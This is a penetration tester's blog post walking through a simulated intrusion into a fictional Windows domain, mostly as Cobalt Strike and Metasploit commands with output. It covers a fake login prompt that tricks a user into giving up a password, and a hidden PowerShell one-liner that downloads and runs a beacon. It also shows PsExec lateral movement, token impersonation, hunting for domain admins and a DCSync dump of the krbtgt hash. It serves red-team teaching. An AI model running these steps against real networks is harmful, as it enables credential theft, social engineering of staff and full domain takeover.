

  
    
  


  




  


  

<!DOCTYPE html>
<html lang="en-us">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.20.2">
    <meta name="theme" content="Tranquilpeak 0.3.1-BETA">
    <title>PsExec Much?</title>
    <meta name="author" content="Rasta Mouse">
    <meta name="keywords" content="">

    <link rel="icon" href="https://rastamouse.me/favicon.png">
    

    
    <meta name="description" content="I recently completed an adversary simulation and thought I would write a short post about some of my experiences.

">
    <meta property="og:description" content="I recently completed an adversary simulation and thought I would write a short post about some of my experiences.

">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="PsExec Much?">
    <meta property="og:url" content="/2017/06/psexec-much/">
    <meta property="og:site_name" content="Rasta Mouse">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Rasta Mouse">
    <meta name="twitter:description" content="I recently completed an adversary simulation and thought I would write a short post about some of my experiences.

">
    
      <meta name="twitter:creator" content="@_RastaMouse">
    
    

    
    

    
      <meta property="og:image" content="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=640">
    

    
      <meta property="og:image" content="https://rastamouse.me/images/psexec/powershell_icon.png">
    
    
    

    

    
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" />
    
    
    <link rel="stylesheet" href="https://rastamouse.me/css/style-u6mk0ojoywresbx8iepslrmmhl4stuhrsxuwhkpwrkrx7mryjcaimasnk4pi.min.css" />
    
    

    
      
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-60712346-1', 'auto');
ga('send', 'pageview');
</script>

    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://rastamouse.me/">Rasta Mouse</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://rastamouse.me/#about">
    
    
    
      
        <img class="header-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=90" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://rastamouse.me/#about">
          <img class="sidebar-profile-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Rasta Mouse</h4>
        
          <h5 class="sidebar-profile-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Categories</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Archives</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://twitter.com/_RastaMouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
      
      <span class="sidebar-button-desc">Twitter</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://keybase.io/rasta_mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-lock"></i>
      
      <span class="sidebar-button-desc">Keybase</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastalabs.net" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-shield"></i>
      
      <span class="sidebar-button-desc">RastaLabs</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/rasta-mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>

    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      PsExec Much?
    </h1>
  
  <div class="postShorten-meta post-meta">
  
    <time itemprop="datePublished" datetime="2017-06-18T00:00:00Z">
      
  
  
  
  
    18 June 2017
  

    </time>
  
  
  
  
    <span>in</span>
    
      <a class="category-link" href="https://rastamouse.me/categories/blog">blog</a>
    
  


</div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <p>I recently completed an adversary simulation and thought I would write a short post about some of my experiences.</p>

<p></p>

<p>The target organisation had an interesting mix of both good (for &ldquo;regulatory compliance&rdquo; purposes) and bad security practices.  Once you&rsquo;ve been around the block enough, you come to learn that implementing security for the sole purpose of passing compliance audits isn&rsquo;t all that effective in mitigating against &ldquo;cyber attack&rdquo; (yeah, I said it), even against actors that aren&rsquo;t particularly sophisticated.</p>

<h2 id="foothold">Foothold</h2>

<p>We&rsquo;ll start with a session as the user <code>awhitehead</code>.  Note that everything you see here are fictional representations.</p>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/1-foothold.png" />
    
    
</figure>


<h2 id="situational-awareness">Situational Awareness</h2>

<p>In this little setup, we have the following:</p>

<pre><code>beacon&gt; net computers

 Server Name             IP Address
 -----------             ----------
 FS-01                   172.16.0.199
 DC-01                   172.16.0.200
 WKSTN-01                172.16.0.201
 WKSTN-02                172.16.0.202
 WKSTN-03                172.16.0.203
</code></pre>

<pre><code>beacon&gt; powershell Get-NetGroupMember -GroupName &quot;Domain Admins&quot;

GroupDomain  : cyber-lance.local
GroupName    : Domain Admins
MemberDomain : cyber-lance.local
MemberName   : lshah_da
MemberSID    : S-1-5-21-884887136-373167198-2530644098-1110
IsGroup      : False
MemberDN     : CN=Logan Shah (DA),CN=Users,DC=cyber-lance,DC=local
</code></pre>

<pre><code>beacon&gt; powershell Get-NetLocalGroup -GroupName Administrators | Select-Object AccountName

AccountName
-----------
CYBER-LANCE/WKSTN-01/Administrator
cyber-lance.local/Domain Admins
cyber-lance.local/Desktop Support
cyber-lance.local/awhitehead
</code></pre>

<pre><code>beacon&gt; powershell Get-NetGroupMember -GroupName &quot;Desktop Support&quot;

GroupDomain  : cyber-lance.local
GroupName    : Desktop Support
MemberDomain : cyber-lance.local
MemberName   : kwilson_adm
MemberSID    : S-1-5-21-884887136-373167198-2530644098-1109
IsGroup      : False
MemberDN     : CN=Keira Wilson (Admin),CN=Users,DC=cyber-lance,DC=local
</code></pre>

<p>What we can observe so far:</p>

<ul>
<li>They&rsquo;re using separate accounts for DA and other administrative purposes.</li>
<li>They suffix their usernames with <code>_da</code> and <code>_adm</code> accordingly.</li>
<li>They add <code>(DA)</code> and <code>(Admin)</code> to their distinguished names.</li>
<li><code>awhitehead</code> is a local admin on his workstation, but not with an <code>_adm</code> account.</li>
</ul>

<p>Knowing this convention makes it easy for us to quickly enumerate potential admin accounts:</p>

<pre><code>beacon&gt; powershell Get-NetUser -Filter &quot;(samaccountname=*_adm)&quot; | Select-Object name, samaccountname

name                                    samaccountname                         
----                                    --------------                         
Keira Wilson (Admin)                    kwilson_adm
</code></pre>

<p>Or find if a standard user has an associated admin account:</p>

<pre><code>beacon&gt; powershell Get-NetUser -Filter &quot;(samaccountname=kwilson*)&quot; | Select-Object name, samaccountname

name                                    samaccountname                         
----                                    --------------                         
Keira Wilson                            kwilson                                
Keira Wilson (Admin)                    kwilson_adm
</code></pre>

<h2 id="local-privilege-escalation">Local Privilege Escalation</h2>

<p><code>awhitehead</code> is a local admin, so there&rsquo;s potential for us to elevate privs on this workstation.  He doesn&rsquo;t have local admin on any other machine.  Before throwing UAC bypasses around, one should always check the UAC configuration.</p>

<pre><code>beacon&gt; powershell Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

PSPath                      : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
PSParentPath                : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
PSChildName                 : System
PSDrive                     : HKLM
PSProvider                  : Microsoft.PowerShell.Core\Registry
ConsentPromptBehaviorAdmin  : 1
ConsentPromptBehaviorUser   : 1
EnableInstallerDetection    : 1
EnableLUA                   : 1
EnableSecureUIAPaths        : 1
EnableUIADesktopToggle      : 1
EnableVirtualization        : 1
PromptOnSecureDesktop       : 1
ValidateAdminCodeSignatures : 0
dontdisplaylastusername     : 0
legalnoticecaption          : 
legalnoticetext             : 
scforceoption               : 0
shutdownwithoutlogon        : 1
undockwithoutlogon          : 1
FilterAdministratorToken    : 0
</code></pre>

<p>Taken from MSDN:</p>

<pre><code>ConsentPromptBehaviorAdmin  : 1  ---&gt;  This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop.
ConsentPromptBehaviorUser   : 1  ---&gt;  This option SHOULD be set to ensure that a standard user that needs to perform an operation that requires elevation of privilege will be prompted for an administrative user name and password. If the user enters valid credentials, the operation will continue with the applicable privilege.
EnableLUA                   : 1  ---&gt;  This policy enables the &quot;administrator in Admin Approval Mode&quot; user type while also enabling all other User Account Control (UAC) policies.
PromptOnSecureDesktop       : 1  ---&gt;  This policy will force all UAC prompts to happen on the user's secure desktop.
</code></pre>

<p>This config broadly translate to the <code>Always Notfiy</code> setting you find in the Control Panel.  In reality, moving that slider affects several registry items at the same time.  So in this scenario, the user would see the UAC prompt if we tried any of the usual bypasses.</p>

<p>If we had the users&rsquo; password, we could use PsExec to start an elevated session on this machine.  You can&rsquo;t <code>psexec</code> to and from the same host (at least in CS), so I pulled out the trusty Metasploit Framework.  To get the user&rsquo;s password, all we have to do is ask.</p>

<p>I use a <a href="https://github.com/rasta-mouse/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1#L19-L21">modified version</a> of <a href="https://twitter.com/@enigma0x3">Matt Nelson&rsquo;s</a> <a href="https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1">Invoke-LoginPrompt</a>.  The only difference being that mine will pop an error message before prompting for creds - choosing something believable may increase the chance of them submitting without too much fuss.  Also, prompting for their standard account password (e.g. to reconnect Outlook) is easier to fool them into inventing a reason why they&rsquo;d need to enter creds for their admin account.</p>

<pre><code>beacon&gt; powershell Invoke-LoginPrompt
</code></pre>

<p>
<figure >
    
        <img src="https://rastamouse.me/images/psexec/2-fake-error.png" />
    
    
</figure>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/3-login-prompt.png" />
    
    
</figure>
</p>

<pre><code>UserName                   Domain                     Password                 
--------                   ------                     --------                 
awhitehead                 CYBER-LANCE                Passw0rd!
</code></pre>

<p>Now to setup beacon and msf.</p>

<pre><code>beacon&gt; socks 32479
beacon&gt; sleep 0
</code></pre>

<pre><code>msf &gt; setg Proxies socks4:163.172.129.30:32479
msf &gt; use exploit/windows/smb/psexec_psh

msf exploit(psexec) &gt; set RHOST 172.16.0.201
msf exploit(psexec) &gt; set SMBDomain cyber-lance
msf exploit(psexec) &gt; set SMBUSER awhitehead
msf exploit(psexec) &gt; set SMBPASS Passw0rd!
msf exploit(psexec) &gt; set payload windows/meterpreter/bind_tcp

msf exploit(psexec) &gt; exploit 

[*] Started bind handler
[*] 172.16.0.201:445 - Connecting to the server...
[*] 172.16.0.201:445 - Authenticating to 172.16.0.201:445|cyber-lance as user 'awhitehead'...
[*] 172.16.0.201:445 - Selecting PowerShell target
[*] 172.16.0.201:445 - Executing the payload...
[+] 172.16.0.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 172.16.0.201
[*] Meterpreter session 1 opened (192.168.41.132:41409 -&gt; 163.172.129.30:32479) at 2017-06-17 21:04:05 +0100

meterpreter &gt; sysinfo 
Computer        : WKSTN-01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_GB
Domain          : CYBER-LANCE
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter &gt; getuid 
Server username: NT AUTHORITY\SYSTEM
</code></pre>

<p>I like to hand the session back over to CS so I have everything in one place.  I&rsquo;ll do this by hosting a stageless PowerShell SMB beacon payload and use a reverse port forward to grab it.  The reason for doing it this way is that the outbound web proxy in this evironment has NTLM auth, which means processes running in SYSTEM context can&rsquo;t talk out to the Internet directly.</p>

<pre><code>beacon&gt; rportfwd 6798 163.172.129.30 80
</code></pre>

<pre><code>meterpreter &gt; shell
Process 2896 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;powershell.exe -nop -w hidden -c &quot;iex ((new-object net.webclient).downloadstring('http://127.0.0.1:6798/smb'))&quot;
</code></pre>

<pre><code>06/17 21:10:40 visit from: 163.172.129.30
    Request: GET /smb
    page Serves /opt/cobaltstrike/uploads/beacon.ps1
    null
</code></pre>

<pre><code>beacon&gt; link 127.0.0.1
[+] established link to child beacon: 172.16.0.201
</code></pre>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/4-foothold-elevate.png" />
    
    
</figure>


<h2 id="lateral-movement">Lateral Movement</h2>

<p>I would never normally recommend going down this route unless you had little alternative.</p>

<p>As it currently stands I have no way of moving laterally across the workstations, but the members of <code>Desktop Support</code> do because they are local admins.  What I could do, is break an application (or carry out some other action) on <code>WKSTN-01</code> so that <code>awhitehead</code> needs to contact the support team for assistance.  They may then remote over to the workstation, where I can hijack their credentials or running process.</p>

<p><code>awhitehead</code> is offered remote assistance by <code>Kiera Wilson (Admin)</code>, to which he accepts.</p>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/5-offerra.png" />
    
    
</figure>


<p>Keira will ask Andrew to allow her to respond to UAC prompts, which he will dutifully do.</p>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/6-offerra.png" />
    
    
</figure>


<p>Keira will then use her credentials to elevate on <code>WKSTN-01</code>, so she can carry out her investigations / fixes.</p>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/7-offerra.png" />
    
    
</figure>


<p>We now have <code>keira_adm</code> authenticated and running elevated processes on the compromised workstation.</p>

<pre><code>beacon&gt; net logons
Logged on users at \\localhost:

CYBER-LANCE\kwilson_adm
CYBER-LANCE\awhitehead
CYBER-LANCE\awhitehead
CYBER-LANCE\awhitehead
CYBER-LANCE\WKSTN-01$
</code></pre>

<pre><code>beacon&gt; shell tasklist /v | findstr /i kwilson_adm
cmd.exe         3348     Console 1     2,272 K     Unknown     CYBER-LANCE\kwilson_adm     0:00:00       N/A                                                                     
conhost.exe     3116     Console 1     3,988 K     Unknown     CYBER-LANCE\kwilson_adm     0:00:0100     N/A 
</code></pre>

<pre><code>beacon&gt; make_token CYBER-LANCE\kwilson_adm Passw0rd!

beacon&gt; psexec_psh wkstn-02 smb
[+] established link to child beacon: 172.16.0.202

beacon&gt; inject 3220 http
</code></pre>

<p><code>3220</code> was the pid of explorer running as <code>kwilson</code>.  I also rearranged my beacons to the following.</p>


<figure >
    
        <img src="https://rastamouse.me/images/psexec/8-kwilson.png" />
    
    
</figure>


<p>I purposely didn&rsquo;t continue using <code>kwilson_adm</code> on <code>WKSTN-01</code> - if I want to reuse her credentials to take the workstation of another privileged user, it will look more natural coming from <code>WKSTN-02</code> than <code>01</code>.  The same reason that once I took <code>WKSTN-02</code> from <code>WKSTN-01</code>, I terminated the connection. You wouldn&rsquo;t normally see connections going <code>01 -&gt; 02</code> but rather <code>02 -&gt; 01</code>.</p>

<h2 id="user-hunting">User Hunting</h2>

<p>To win the game, we now need to find the workstation of a DA, move across and plunder.  It&rsquo;s an obvious failing of this organisation, that even though they&rsquo;re using separate admin accounts, they&rsquo;re still used across low-tier workstations.  We should be able to find the standard account of a DA logged into a workstation and they&rsquo;ll be doing something like <code>runas mmc</code> with their DA creds.</p>

<pre><code>beacon&gt; powershell Invoke-UserHunter

UserDomain      : CYBER-LANCE
UserName        : lshah_da
ComputerName    : WKSTN-03.cyber-lance.local
IPAddress       : 172.16.0.203
SessionFrom     : 
SessionFromName : 
LocalAdmin      :  
</code></pre>

<pre><code>beacon&gt; powershell Get-NetComputer | Get-NetLoggedOn | Where {$_.wkui1_username -like &quot;lshah_da&quot;} | Select-Object ComputerName

ComputerName                                                                   
------------                                                                   
WKSTN-03.cyber-lance.local                                                     
WKSTN-03.cyber-lance.local 
</code></pre>

<pre><code>beacon&gt; psexec_psh wkstn-03 smb
[+] established link to child beacon: 172.16.0.203
</code></pre>

<pre><code>beacon&gt; net logons
Logged on users at \\localhost:

CYBER-LANCE\lshah_da
CYBER-LANCE\lshah
CYBER-LANCE\WKSTN-03$
</code></pre>

<pre><code>beacon&gt; shell tasklist /v | findstr /i lshah_da
mmc.exe     3220     Console 2     2,688 K     Unknown     CYBER-LANCE\lshah_da     0:00:00     N/A
</code></pre>

<h2 id="game-over">Game Over</h2>

<pre><code>beacon&gt; make_token CYBER-LANCE\lshah_da Passw0rd!
beacon&gt; dcsync cyber-lance.local cyber-lance\krbtgt

[DC] 'cyber-lance.local' will be the domain
[DC] 'dc-01.cyber-lance.local' will be the DC server
[DC] 'cyber-lance\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 17/06/2017 17:22:39
Object Security ID   : S-1-5-21-884887136-373167198-2530644098-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 8aa0265124c7696166d01c1431ff6c44
    ntlm- 0: 8aa0265124c7696166d01c1431ff6c44
    lm  - 0: b5cf441f199c4456800a29a0312146b7
</code></pre>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/cobalt-strike/">cobalt strike</a>

  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/psexec/">psexec</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/06/cobalt-strike---spawn-as/" data-tooltip="Cobalt Strike - Spawn As">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/05/playing-with-cuckoo/" data-tooltip="Playing with Cuckoo">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2017 Rasta Mouse. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/06/cobalt-strike---spawn-as/" data-tooltip="Cobalt Strike - Spawn As">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/05/playing-with-cuckoo/" data-tooltip="Playing with Cuckoo">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <ul class="share-options">
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
        <i class="fa fa-google-plus"></i><span>Share on Google Plus</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
        <i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f06%2fpsexec-much%2f">
        <i class="fa fa-twitter"></i><span>Share on Twitter</span>
      </a>
    </li>
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Rasta Mouse</h4>
    
      <div id="about-card-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Penetration Tester
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        UK
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/cobalt-strike---spawn-as/">
                <h3 class="media-heading">Cobalt Strike - Spawn As</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><pre><code>beacon&gt; getuid
[*] You are CYBER-LANCE\sgomez

beacon&gt; spawnas cyber-lance\tswift Passw0rd! smb
</code></pre>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/psexec-much/">
                <h3 class="media-heading">PsExec Much?</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently completed an adversary simulation and thought I would write a short post about some of my experiences.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/playing-with-cuckoo/">
                <h3 class="media-heading">Playing with Cuckoo</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>After the release and complete hubbub that <a href="https://en.wikipedia.org/wiki/WannaCry_ransomware_attack">WannaCry</a> caused, I thought it would be fun to play with <a href="https://cuckoosandbox.org/">Cuckoo Sandbox</a>.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/a-citrix-story/">
                <h3 class="media-heading">A Citrix Story</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently had the pleasure of partaking in a Citrix Virtual Desktop infrastructure assessment.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/post/">
                <h3 class="media-heading">Posts</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         5 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://rastamouse.me/images/cover.jpg');"></div>
  


    
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/highlight.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.js"></script>


